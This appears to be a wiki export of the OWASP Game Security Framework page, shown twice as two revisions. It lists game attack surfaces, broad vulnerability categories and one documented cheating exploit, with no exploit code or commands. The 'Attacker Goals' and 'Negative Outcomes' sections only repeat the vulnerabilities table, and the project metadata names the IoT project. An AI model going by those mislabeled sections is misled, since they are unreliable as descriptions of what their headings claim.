In 2016 the videogame market became 99.6 Billion dollar industry... any why shouldn't it be? Some of the most prolific and complex software developed today are video games. They are professionally played, sponsored, scrutinized, monetized, and celebrated, just like many sports. They handle clients, servers, web components, monetary transfers, social interactions, virtual markets, etc, with every bit the need of security that most internet hosted apps have (if not more in some cases). The GSF is designed to help threat model gaming issues that have devastated new games. Most importantly we hope the GSF can help new developers and security testers alike root out bugs in your favorite titles.

''The framework is broken into three main concepts / sections:''

'''1. Identifying and clustering the components of risk within the overall game security space, and then giving instances of each component.'''

''Components include the following:''

* '''Attack Surfaces''': the various surface areas that can be attacked by attackers in order to cause harm to the gaming ecosystem.

* '''Vulnerabilities''': the specific weaknesses in design or implementation that allows attackers to successfully target a given game.

* '''Attacker Goals''': a list of the reasons that an attacker might want to attack a given game.

* '''Negative Outcomes''': a collection of ways that the gaming company could ultimately be impacted negatively by attacks to its game and associated infrastructure.

'''2. A natural language semantic structure for thinking about and articulating game security issues, which uses the modular risk components as sentence structure.'''

''Example:''

: "The attacker attacked and edited the <code>LOCAL GAME CLIENT (Attack Surface)</code>, which had a <code>LACK OF CLIENT INTEGRITY CONTROLS (Vulnerability)</code>, which allowed her to <code>ARTIFICIALLY INCREASE HER ABILITIES (Attacker Goal)</code>, ultimately leading to an <code>UNHAPPY PLAYER BASE (Negative Outcome)</code> and <code>DECLINING GAME REVENUE (Negative Outcome)</code> due to cheating.”

Using this structure, security testers can clearly communicate the various aspects of a game security issue to many different types of stakeholder—from pentesting peers to business executives in the gaming industry.

'''3. Examples of real-world examples of previous attacks against games, and how the attacks map to the GSF framework components.'''

==Licensing==
The OWASP Game Security Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

{{Social Media Links}}

| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the OWASP Game Security Framework? ==

The goal of the OWASP Game Security Framework is to provide a structure for discussing the various aspects around the security of video games.

The target audience for the project includes:

* Gamers
* QA
* Game designers
* Penetration testers
* Gaming executives
* Anyone else with a vested interest in game security

== Project Leaders ==

* Jason Haddix
* Daniel Miessler

== Contributors ==
* Kevin Hemmingsen
* Troy Cunefare
* Ryan Lawrence
* Martin Mendoza
* Koray Algan
* Tom Simkovic

== Related Projects ==

* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]

| valign="top" style="padding-left:25px;width:200px;" |

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Quick Download ==

COMING SOON

== News and Events ==
* ''[JANUARY 2017]'' Doing a complete redesign of the project.

==Classifications==

{| width="200" cellpadding="2"
|-
| rowspan="2" align="center" valign="top" width="50%" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%" | [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%" | [[File:Owasp-defenders-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]
|}

|}

= Game Attack Surfaces =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Attack Surfaces ==

The following is a list of the attack surfaces that can be found in video games of various types.

{| class="wikitable" border="1" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* The locally running game client that is accessible to the gamer because it's running on his/her machine.
|-
| '''Game Network Traffic'''
|
* The network which game traffic traverses in order to reach the game's server or peers who are playing the game.
|-
| '''Game Server'''
|
* The game server that is hosting the instance that gamers connect to in order to play the game.
|-
| '''Game Economy'''
|
* The economic system that exists within the game.
|-
|}

{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Attack Surfaces Section? ==

This section provides an overview of the various places an attacker can target to harm a given game infrastructure.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Quick Download ==
* Coming Soon

== News and Events ==
* Coming Soon

|}

= Game Vulnerabilities =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| class="wikitable" border="1" style="text-align: left"
! Attack Surface
! Vulnerability Name
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Jason Haddix

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Attacker Goals =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| class="wikitable" border="1" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Negative Outcomes =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| class="wikitable" border="1" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Defenses =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Common Game Security Defenses ==

Table Here

{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}
= Examples =

== Real-world Examples of Gaming Vulnerabilities==

''Vulnerability 1''

{| class="wikitable"
! style="font-weight: bold;" | Vulnerabilty Name
! style="font-weight: bold;" | Description
! style="font-weight: bold;" | Surface Area
! style="font-weight: bold;" | Attacker Goal
! style="font-weight: bold;" | Negative Outcome
! style="font-weight: bold;" | Tester Tool
! style="font-weight: bold;" | Defense
! Ref
! Genre
|-
| Local Resource Modification, Client-side Logic Flaw
| In 2015 The Division experienced an exploit that allowed an attacker to switch weapons rapidly, applying weapon buffs in a stacking manner, with no cap.
| Game Client
| Unfair Player Advantage
| Player Anger, Lost Revenue
| Game Client
| Cryptographic Integrity Checks on Game Client
| http://www.gamesradar.com/theres-a-division-damage-stacking-glitch-if-youve-got-fast-fingers/
| 3PS/1PS/MMO
|-
| colspan="9" style="text-align: center;" | The attacker attacked and edited the LOCAL GAME CLIENT (Attack Surface), which had a LACK OF CLIENT INTEGRITY CONTROLS (Vulnerability), which allowed her to ARTIFICIALLY INCREASE HER ABILITIES (Attacker Goal), ultimately leading to an UNHAPPY PLAYER BASE (Negative Outcome) and DECLINING GAME REVENUE (Negative Outcome) due to cheating.
|-
|
|
|
|
|
|
|
|
|
|}
''Template 1''

: "The attacker attacked and edited the <code>LOCAL GAME CLIENT (Attack Surface)</code>, which had a <code>LACK OF CLIENT INTEGRITY CONTROLS (Vulnerability)</code>, which allowed her to <code>ARTIFICIALLY INCREASE HER ABILITIES (Attacker Goal)</code>, ultimately leading to an <code>UNHAPPY PLAYER BASE (Negative Outcome)</code> and <code>DECLINING GAME REVENUE (Negative Outcome)</code> due to cheating.”

{{Social Media Links}}

= Community =

[https://www.iamthecavalry.org/ I Am The Cavalry]

A global grassroots organization that is focused on issues where computer security intersects public safety and human life.

Their areas of focus include:
* Medical devices
* Automobiles
* Home Electronics
* Public Infrastructure

[http://builditsecure.ly BuildItSecure.ly]

A project focused on helping small business connect with security researchers to aid in securing their IoT-based products before going market.

Their goals include:
* Focus effort towards small business
* Build partnerships
* Coordinate efforts
* Curate informational resources
* Present research

[https://otalliance.org Online Trust Alliance]

Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.

Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.

[https://allseenalliance.org/framework AllSeen Alliance]

The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.

[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]

The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.

[http://securingsmartcities.org/ Securing Smart Cities]

Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.

===Talks===

RSA Conference San Francisco <br>
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br>
Daniel Miessler, Practice Principal <br>
April 21, 2015 <br>
--- <br>
Defcon 23 <br>
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br>
Daniel Miessler <br>
August 6-9, 2015

===Podcasts===

* [http://iotpodcast.com/ The Internet of Things Podcast]
* [http://www.iot-inc.com/ IoT Inc]
* [https://craigsmith.net/category/podcast/ IoT This Week]
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]

===IoT Conferences===

* [http://www.iotevents.org Internet of Things Events]

Conference Call for Papers
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]
|}

= Testing Tools =

== Commonly Used Game Hacking Tools ==

{{Social Media Links}}

=Project About=

{{Template:Project About
| project_name =OWASP Internet of Things Project
| project_description =
| project_license =CC-BY 3.0 for documentation and GPLv3 for code.
| leader_name1 = Daniel Miessler
| leader_email1 =
| leader_username1 =
| leader_name2 =Craig Smith
| leader_email2 =
| leader_username2 =
| contributor_name1 = Justin Klein Keane]
| contributor_email1 =
| contributor_username1 = Justin_C._Klein_Keane
| contributor_name2 = Yunsoul
| contributor_email2 =
| contributor_username2 = Yunsoul
| mailing_list_name =
| links_url1 =
| links_name1 =
}}

__NOTOC__ <headertabs></headertabs>

[[Category:OWASP_Project]]
[[Category:OWASP_Document]]
[[Category:OWASP_Download]]
[[Category:OWASP_Release_Quality_Document]]

OWASP Game Security Framework Project

2017-03-21T05:49:30Z

Jason Haddix: /* Contributors */

= About the Project =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

==OWASP Game Security Framework (GSF)==

'''The OWASP Game Security Framework (GSF) represents a modular approach to understanding the security issues that surround video game ecosystems.'''

In 2016 the videogame market became 99.6 Billion dollar industry... any why shouldn't it be? Some of the most prolific and complex software developed today are video games. They are professionally played, sponsored, scrutinized, monetized, and celebrated, just like many sports. They handle clients, servers, web components, monetary transfers, social interactions, virtual markets, etc, with every bit the need of security that most internet hosted apps have (if not more in some cases). The GSF is designed to help threat model gaming issues that have devastated new games. Most importantly we hope the GSF can help new developers and security testers alike root out bugs in your favorite titles.

''The framework is broken into three main concepts / sections:''

'''1. Identifying and clustering the components of risk within the overall game security space, and then giving instances of each component.'''

''Components include the following:''

* '''Attack Surfaces''': the various surface areas that can be attacked by attackers in order to cause harm to the gaming ecosystem.

* '''Vulnerabilities''': the specific weaknesses in design or implementation that allows attackers to successfully target a given game.

* '''Attacker Goals''': a list of the reasons that an attacker might want to attack a given game.

* '''Negative Outcomes''': a collection of ways that the gaming company could ultimately be impacted negatively by attacks to its game and associated infrastructure.

'''2. A natural language semantic structure for thinking about and articulating game security issues, which uses the modular risk components as sentence structure.'''

''Example:''

: "The attacker attacked and edited the <code>LOCAL GAME CLIENT (Attack Surface)</code>, which had a <code>LACK OF CLIENT INTEGRITY CONTROLS (Vulnerability)</code>, which allowed her to <code>ARTIFICIALLY INCREASE HER ABILITIES (Attacker Goal)</code>, ultimately leading to an <code>UNHAPPY PLAYER BASE (Negative Outcome)</code> and <code>DECLINING GAME REVENUE (Negative Outcome)</code> due to cheating.”

Using this structure, security testers can clearly communicate the various aspects of a game security issue to many different types of stakeholder—from pentesting peers to business executives in the gaming industry.

'''3. Examples of real-world examples of previous attacks against games, and how the attacks map to the GSF framework components.'''

==Licensing==
The OWASP Game Security Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

{{Social Media Links}}

| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the OWASP Game Security Framework? ==

The goal of the OWASP Game Security Framework is to provide a structure for discussing the various aspects around the security of video games.

The target audience for the project includes:

* Gamers
* QA
* Game designers
* Penetration testers
* Gaming executives
* Anyone else with a vested interest in game security

== Project Leaders ==

* Jason Haddix
* Daniel Miessler

== Contributors ==
* Kevin Hemmingsen
* Troy Cunefare
* Ryan Lawrence
* Martin Mendoza
* Koray Algan

== Related Projects ==

* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]

| valign="top" style="padding-left:25px;width:200px;" |

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Quick Download ==

COMING SOON

== News and Events ==
* ''[JANUARY 2017]'' Doing a complete redesign of the project.

==Classifications==

{| width="200" cellpadding="2"
|-
| rowspan="2" align="center" valign="top" width="50%" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%" | [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%" | [[File:Owasp-defenders-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]
|}

|}

= Game Attack Surfaces =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Attack Surfaces ==

The following is a list of the attack surfaces that can be found in video games of various types.

{| class="wikitable" border="1" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* The locally running game client that is accessible to the gamer because it's running on his/her machine.
|-
| '''Game Network Traffic'''
|
* The network which game traffic traverses in order to reach the game's server or peers who are playing the game.
|-
| '''Game Server'''
|
* The game server that is hosting the instance that gamers connect to in order to play the game.
|-
| '''Game Economy'''
|
* The economic system that exists within the game.
|-
|}

{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Attack Surfaces Section? ==

This section provides an overview of the various places an attacker can target to harm a given game infrastructure.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Quick Download ==
* Coming Soon

== News and Events ==
* Coming Soon

|}

= Game Vulnerabilities =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| class="wikitable" border="1" style="text-align: left"
! Attack Surface
! Vulnerability Name
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Jason Haddix

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Attacker Goals =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| class="wikitable" border="1" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Negative Outcomes =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| class="wikitable" border="1" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Defenses =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Common Game Security Defenses ==

Table Here

{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}
= Examples =

== Real-world Examples of Gaming Vulnerabilities==

''Vulnerability 1''

{| class="wikitable"
! style="font-weight: bold;" | Vulnerabilty Name
! style="font-weight: bold;" | Description
! style="font-weight: bold;" | Surface Area
! style="font-weight: bold;" | Attacker Goal
! style="font-weight: bold;" | Negative Outcome
! style="font-weight: bold;" | Tester Tool
! style="font-weight: bold;" | Defense
! Ref
! Genre
|-
| Local Resource Modification, Client-side Logic Flaw
| In 2015 The Division experienced an exploit that allowed an attacker to switch weapons rapidly, applying weapon buffs in a stacking manner, with no cap.
| Game Client
| Unfair Player Advantage
| Player Anger, Lost Revenue
| Game Client
| Cryptographic Integrity Checks on Game Client
| http://www.gamesradar.com/theres-a-division-damage-stacking-glitch-if-youve-got-fast-fingers/
| 3PS/1PS/MMO
|-
| colspan="9" style="text-align: center;" | The attacker attacked and edited the LOCAL GAME CLIENT (Attack Surface), which had a LACK OF CLIENT INTEGRITY CONTROLS (Vulnerability), which allowed her to ARTIFICIALLY INCREASE HER ABILITIES (Attacker Goal), ultimately leading to an UNHAPPY PLAYER BASE (Negative Outcome) and DECLINING GAME REVENUE (Negative Outcome) due to cheating.
|-
|
|
|
|
|
|
|
|
|
|}
''Template 1''

: "The attacker attacked and edited the <code>LOCAL GAME CLIENT (Attack Surface)</code>, which had a <code>LACK OF CLIENT INTEGRITY CONTROLS (Vulnerability)</code>, which allowed her to <code>ARTIFICIALLY INCREASE HER ABILITIES (Attacker Goal)</code>, ultimately leading to an <code>UNHAPPY PLAYER BASE (Negative Outcome)</code> and <code>DECLINING GAME REVENUE (Negative Outcome)</code> due to cheating.”

{{Social Media Links}}

= Community =

[https://www.iamthecavalry.org/ I Am The Cavalry]

A global grassroots organization that is focused on issues where computer security intersects public safety and human life.

Their areas of focus include:
* Medical devices
* Automobiles
* Home Electronics
* Public Infrastructure

[http://builditsecure.ly BuildItSecure.ly]

